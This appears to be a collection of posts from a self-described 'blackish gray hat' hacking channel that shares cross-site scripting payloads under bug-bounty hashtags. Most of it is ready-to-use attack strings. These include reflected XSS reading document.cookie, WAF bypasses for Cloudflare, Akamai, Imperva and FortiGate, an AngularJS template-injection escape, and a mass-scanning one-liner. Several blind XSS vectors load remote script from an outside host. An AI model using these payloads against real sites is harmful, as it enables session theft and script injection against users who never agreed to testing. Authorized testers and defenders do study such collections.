Eʀᴏ ··ʜᴀᴄᴋ··
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
This payload can be used for client-side template injection and reflected XSS; perhaps a code injection can be triggered in the background.

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
@EroHack0
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
👺 XSS one-liner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln



#XSS #BugBounty

🌐@EroHack
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
🟫 WAF Fortinet FortiGate XSS Bypass

🖥Payload
<details open ontoggle="(()=>alertibrahimxss)()"></details>

#XSS #WAF #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
🙂 One XSS payload to bypass (Akamai, Imperva, Cloudflare & WAF) 🚪

HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#Xss #Payload #Waf

🌐EroHack
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
😀XSS in Office.com. The + made a difference.

Payload:
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack